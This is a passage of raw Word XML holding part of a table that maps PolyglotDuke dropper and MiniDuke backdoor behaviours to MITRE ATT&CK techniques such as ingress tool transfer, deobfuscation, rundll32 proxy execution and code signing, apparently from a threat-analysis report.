                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="316F3A66" w14:textId="355ACE33" w:rsidR="00AA5C01" w:rsidRPr="00F35DE8" w:rsidRDefault="00F35DE8" w:rsidP="00E530D0">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132032E0" w14:textId="551B1EAC" w:rsidR="00AA5C01" w:rsidRPr="00F35DE8" w:rsidRDefault="00943C83" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00943C83">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00943C83">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1105 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00943C83">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="653" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="554C6A5B" w14:textId="158505AE" w:rsidR="00AA5C01" w:rsidRPr="00F35DE8" w:rsidRDefault="002B73F8" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F98FAA0" w14:textId="77777777" w:rsidR="00AA5C01" w:rsidRPr="00F35DE8" w:rsidRDefault="00AA5C01" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="640" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AD3B699" w14:textId="20516A86" w:rsidR="00AA5C01" w:rsidRPr="00F35DE8" w:rsidRDefault="00F35DE8" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0710E9C5" w14:textId="3C359582" w:rsidR="00AA5C01" w:rsidRPr="00F35DE8" w:rsidRDefault="006F241D" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2938" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EE4EA68" w14:textId="7405AB55" w:rsidR="00AA5C01" w:rsidRPr="0096445D" w:rsidRDefault="00AA5C01" w:rsidP="00E530D0">
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA5C01">
              <w:t>PolyglotDuke</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA5C01">
              <w:t xml:space="preserve"> is a downloader that is used to download and drop the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA5C01">
              <w:t>MiniDuke</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA5C01">
              <w:t xml:space="preserve"> backdoor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00943C83" w:rsidRPr="00AA5C01" w14:paraId="3CF307A9" w14:textId="77777777" w:rsidTr="00B1179F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D9AAD3A" w14:textId="0B7DABA0" w:rsidR="00943C83" w:rsidRPr="00AA5C01" w:rsidRDefault="002B73F8" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21F456E0" w14:textId="77777777" w:rsidR="00943C83" w:rsidRPr="00AA5C01" w:rsidRDefault="00943C83" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AA5C01">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00AA5C01">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00AA5C01">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA5C01">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA5C01">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2355" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35B589D2" w14:textId="77777777" w:rsidR="00943C83" w:rsidRPr="00AA5C01" w:rsidRDefault="00943C83" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AA5C01">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00AA5C01">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1140 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00AA5C01">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA5C01">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Deobfuscate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA5C01">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>/Decode Files or Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="653" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10750AD8" w14:textId="4E4ADC5F" w:rsidR="00943C83" w:rsidRPr="00AA5C01" w:rsidRDefault="002B73F8" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="752DB3DE" w14:textId="77777777" w:rsidR="00943C83" w:rsidRPr="00AA5C01" w:rsidRDefault="00943C83" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="640" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="755A3CB6" w14:textId="77777777" w:rsidR="00943C83" w:rsidRPr="00AA5C01" w:rsidRDefault="00943C83" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21D81611" w14:textId="4085F6FC" w:rsidR="00943C83" w:rsidRPr="00AA5C01" w:rsidRDefault="006F241D" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2938" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79D35F11" w14:textId="77777777" w:rsidR="00943C83" w:rsidRPr="00F35DE8" w:rsidRDefault="00943C83" w:rsidP="00E530D0">
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>PolyglotDoke</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> dropper </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>deobfuscated</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> before running (Dropper </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>desc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> p14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00943C83" w:rsidRPr="00743E00" w14:paraId="1F6A2A13" w14:textId="77777777" w:rsidTr="00B1179F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5279BB3B" w14:textId="73C96C79" w:rsidR="00943C83" w:rsidRPr="00F35DE8" w:rsidRDefault="002B73F8" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2310A24C" w14:textId="3B5DD45F" w:rsidR="00943C83" w:rsidRPr="005B3D45" w:rsidRDefault="00A63A0F" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AA5C01">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00AA5C01">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00AA5C01">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA5C01">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA5C01">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2355" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="502F0B9C" w14:textId="07BE6B31" w:rsidR="00943C83" w:rsidRPr="00943C83" w:rsidRDefault="00443430" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00443430">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1218.011</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00443430">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>System Binary Proxy Execution: Rundll32</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="653" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37DD3CE2" w14:textId="4624FE82" w:rsidR="00943C83" w:rsidRDefault="002B73F8" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D758271" w14:textId="77777777" w:rsidR="00943C83" w:rsidRPr="00F35DE8" w:rsidRDefault="00943C83" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="640" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="601A08CF" w14:textId="67FE68EC" w:rsidR="00943C83" w:rsidRDefault="00443430" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61D0CC48" w14:textId="597095EE" w:rsidR="00943C83" w:rsidRPr="00F35DE8" w:rsidRDefault="006F241D" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV/NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2938" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F6A6BEC" w14:textId="77777777" w:rsidR="00943C83" w:rsidRDefault="00943C83" w:rsidP="00E530D0">
            <w:r>
              <w:t>[1] dropper executed using rundll32.exe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2239D341" w14:textId="07C93CEB" w:rsidR="00794B8F" w:rsidRDefault="00794B8F" w:rsidP="00E530D0">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>MiniDuke</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> backdoor dropped</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C2073" w:rsidRPr="00794B8F" w14:paraId="5DB42796" w14:textId="77777777" w:rsidTr="00B1179F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2597CDB7" w14:textId="6FC40A98" w:rsidR="00CB1EC7" w:rsidRPr="00794B8F" w:rsidRDefault="00794B8F" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00794B8F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1719" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BBBA877" w14:textId="22656C3E" w:rsidR="00CB1EC7" w:rsidRPr="00794B8F" w:rsidRDefault="00794B8F" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00794B8F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00794B8F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00794B8F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00794B8F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00794B8F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2355" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="793AC5E7" w14:textId="303A0B0D" w:rsidR="00CB1EC7" w:rsidRPr="00794B8F" w:rsidRDefault="00794B8F" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00794B8F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1553.002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00794B8F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Subvert Trust Controls&gt;:Code Signing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="653" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EC7259A" w14:textId="349BB7F5" w:rsidR="00CB1EC7" w:rsidRPr="00794B8F" w:rsidRDefault="00794B8F" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00794B8F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18FA7A5C" w14:textId="77777777" w:rsidR="00CB1EC7" w:rsidRPr="00794B8F" w:rsidRDefault="00CB1EC7" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="640" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C34E719" w14:textId="4ED74C6C" w:rsidR="00CB1EC7" w:rsidRPr="00794B8F" w:rsidRDefault="00794B8F" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00794B8F">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="865" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74929574" w14:textId="476DD7C7" w:rsidR="00CB1EC7" w:rsidRPr="00794B8F" w:rsidRDefault="006F241D" w:rsidP="00E530D0">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2938" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="367C6825" w14:textId="2341A646" w:rsidR="00CB1EC7" w:rsidRPr="00794B8F" w:rsidRDefault="00794B8F" w:rsidP="00E530D0">
            <w:r>
              <w:t xml:space="preserve">[1] Invalid digital signature included in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>MiniDuke</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> backdoor</w:t>
            </w:r>
          </w:p>
